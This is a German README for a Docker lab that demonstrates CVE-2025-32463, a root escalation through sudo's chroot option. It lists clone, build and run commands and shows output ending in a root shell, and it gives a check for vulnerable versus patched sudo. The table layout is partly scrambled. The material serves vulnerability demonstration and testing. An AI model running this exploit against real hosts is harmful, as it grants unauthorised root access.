
C-Neuimplementierung des chwoot-PoC
Dieses Repository bietet eine minimale, reproduzierbare Umgebung zur Demonstration der CVE‑2025‑32463-Schwachstelle zur Privilege-Eskalation in der chroot-Funktion von sudo.
Betroffen sind anfällige Builds von sudo 1.9.14 bis 1.9.17 (alle p‑Revisionen) auf den meisten Linux-Distributionen.
Sicherheitsseiten
| Datei | Zweck |
|---|---|
| Dockerfile | Erstellt ein Ubuntu-24.04-Image mit anfälligem sudo 1.9.16p2 und Build-Werkzeugen |
| sudo‑chwoot.sh | Proof-of-Concept-Exploit, der eine Root-Shell innerhalb des Chroots startet |
| run.sh |
# Anfälliges sudo
poc ~ $ sudo -R woot woot
sudo: woot: No such file or directory
# Gepatchtes sudo
poc ~ $ sudo -R woot woot
[sudo] password for poc:
sudo: you are not permitted to use the -R option with woot
# 1 – Repository klonen
$ git clone https://github.com/vpr-labs/CVE-2025-32463.git
$ cd CVE-2025-32463
# 2 – Docker-Image erstellen und ausführen (Tag "vpr-chwoot")
$ ./run.sh
# 3 – Exploit im Container ausführen (führt Root-Befehl direkt aus)
poc@f722d9182d1f:~$ make && ./vpr-chwoot
woot!
root@f722d9182d1f:/# id
uid=0(root) gid=0(root) groups=0(root),1001(poc)
root@f722d9182d1f:/#
run.sh übergibt --privileged und --rm an Docker, sodass sich der Container beim Verlassen selbst bereinigt.
Entferne das Image, wenn du fertig bist:
docker rmi vpr-chwoot
| Hilfsskript, das das Image (falls nötig) erstellt und den Exploit-Container startet |